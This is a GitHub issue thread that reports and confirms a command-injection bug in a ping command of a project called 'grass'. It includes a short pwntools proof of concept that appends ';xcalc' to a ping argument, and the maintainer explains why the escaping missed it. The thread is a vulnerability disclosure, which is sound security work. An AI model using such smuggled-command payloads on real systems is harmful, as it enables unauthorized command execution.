You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
They have an "escape" function they use to escape strings that represent a path, but they do not check against any ";" character that one could potentially use to terminate a command and start a new one. Thus, I exploited the ping command by appending another new command (xcalc) that will be executed right after the ping.
Here is a PoC:
#!/usr/bin/env python
from pwn import *
sh = process(['./client', '127.0.0.1', '1337'])
sh.sendline("ping google.ch;xcalc\n")
print sh.interactive()
The text was updated successfully, but these errors were encountered:
You are correct, there is indeed a vulnerability in the ping command and we certifiy that your exploit works. 🥇
However, let me make some clarifications:
While we have an escape function as you noticed, one of our programmers somehow forgot to call it for the ping command.
Morover, this escape function only escapes quotes in a given string, which is an intended behavior. The idea is to put escaped user-supplied arguments bash commands between quotes to prevent the execution of unintended additional commands. As an example, have a look at the cd command which does not suffer from the same vulnerability:
Where:
grass/src/commands.cpp
Line 71 in a5b8f5a
They have an "escape" function they use to escape strings that represent a path, but they do not check against any ";" character that one could potentially use to terminate a command and start a new one. Thus, I exploited the ping command by appending another new command (xcalc) that will be executed right after the ping.
Here is a PoC:
The text was updated successfully, but these errors were encountered: